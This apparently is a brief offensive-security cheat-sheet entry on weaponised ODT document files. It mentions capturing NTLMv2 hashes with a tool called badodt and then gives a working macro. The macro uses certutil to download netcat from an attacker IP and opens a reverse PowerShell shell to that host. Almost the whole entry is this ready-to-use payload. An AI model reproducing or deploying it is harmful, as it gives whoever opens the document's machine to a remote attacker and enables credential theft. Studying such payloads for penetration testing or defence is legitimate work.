ODT Files
Catch NTLMv2 hashes with badodt
Catch a reverse shell instead
Sub Main
shell("cmd /c certutil.exe -urlcache -f http://192.168.45.239/nc.exe C:\programdata\nc.exe")
shell("C:\programdata\nc.exe 192.168.45.239 1337 -e powershell.exe")
End Sub
Last updated